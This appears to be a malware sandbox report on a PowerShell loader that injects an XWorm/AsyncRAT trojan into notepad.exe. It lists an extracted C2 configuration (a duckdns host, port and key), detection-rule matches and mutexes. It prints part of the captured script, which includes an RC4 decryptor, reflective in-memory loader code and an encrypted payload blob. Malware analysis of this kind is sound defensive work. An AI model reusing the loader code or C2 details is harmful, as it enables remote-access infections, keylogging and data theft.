Source: 00000007.00000002.3067774125.000001D114C51000.00000004.00000800.00020000.00000000.sdmp |
Malware Configuration Extractor: Xworm {"C2 url": ["nmds.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"} |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack |
String decryptor: nmds.duckdns.org |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack |
String decryptor: 8895 |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack |
String decryptor: <123456789> |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack |
String decryptor: <Xwormmm> |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack |
String decryptor: USB.exe |
Source: Malware configuration extractor |
URLs: nmds.duckdns.org |
Source: powershell.exe, 00000000.00000002.3073247493.0000011C86717000.00000004.00000800.00020000.00000000.sdmp, py.ps1 |
String found in binary or memory: https://github.com/DARKNOSY/Rush-PowerShell-Obfuscator |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, XLogger.cs |
.Net Code: KeyboardLayout |
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, XLogger.cs |
.Net Code: KeyboardLayout |
Source: 7.2.notepad.exe.1d114a90000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 7.2.notepad.exe.1d114c5cec8.1.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown |
Source: 00000007.00000002.3067644587.000001D114A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000007.00000002.3067774125.000001D114C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: C:\Windows\System32\notepad.exe |
Code function: 7_2_000001D112FCAF23 |
7_2_000001D112FCAF23 |
Source: C:\Windows\System32\notepad.exe |
Code function: 7_2_000001D112FCAB03 |
7_2_000001D112FCAB03 |
Source: C:\Windows\System32\notepad.exe |
Code function: 7_2_000001D112FCB35B |
7_2_000001D112FCB35B |
Source: C:\Windows\System32\notepad.exe |
Code function: 7_2_000001D112FCB7E3 |
7_2_000001D112FCB7E3 |
Source: C:\Windows\System32\notepad.exe |
Code function: 7_2_000001D112FC9EDB |
7_2_000001D112FC9EDB |
Source: 7.2.notepad.exe.1d114a90000.0.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 7.2.notepad.exe.1d114c5cec8.1.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13 |
Source: 00000007.00000002.3067644587.000001D114A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000007.00000002.3067774125.000001D114C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, AlgorithmAES.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, AlgorithmAES.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, ClientSocket.cs |
Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, ClientSocket.cs |
Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, ClientSocket.cs |
Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, ClientSocket.cs |
Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
Source: classification engine |
Classification label: mal100.troj.spyw.evad.winPS1@4/10@0/0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache |
Jump to behavior |
Source: C:\Windows\System32\notepad.exe |
Mutant created: NULL |
Source: C:\Windows\System32\notepad.exe |
Mutant created: \Sessions\1\BaseNamedObjects\O3B5rRVaa3oX74CD |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcgvnz3n.01j.ps1 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();Set-StrictMode -Version 2$DoIt = @'function Crypt { param ( [byte[]]$key, [byte[]]$data ) $s = 0..255 $j = 0 for ($i = 0; $i -lt 256; $i++) { $j = ($j + $s[$i] + $key[$i % $key.Length]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] } $i = $j = 0 $output = [byte[]]::new($data.Length) for ($count = 0; $count -lt $data.Length; $count++) { $i = ($i + 1) % 256 $j = ($j + $s[$i]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] $k = $s[($s[$i] + $s[$j]) % 256] $output[$count] = $data[$count] -bxor $k } $output}function func_get_proc_address{Param($var_module, $var_procedure)$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress',[Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))}function func_get_delegate_type{Param([Parameter(Position = 0, Mandatory = $True)][Type[]] $var_parameters,[Parameter(Position = 1)][Type] $var_return_type = [Void])$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')return $var_type_builder.CreateType()}[Byte[]]$encryptedData = [System.Convert]::FromBase64String('S2zQef7TSeC39ba951ff8aLEINWPwe4gd9a4D0IvvbJAKTLwScmCXssrU5vuP0I6d8DDIqWLhFUVxXHWNW6xFuvYV8uJMBzIJGXdZPpyhcn+czDuyHLf0WkTCmsH7ynEolA9SwiJ+qNnNXmFg8eJBCYd7S7bAjzXGx6f3OM40JKvgSawCx6PdpB85hZmymkB2R+rWCntV |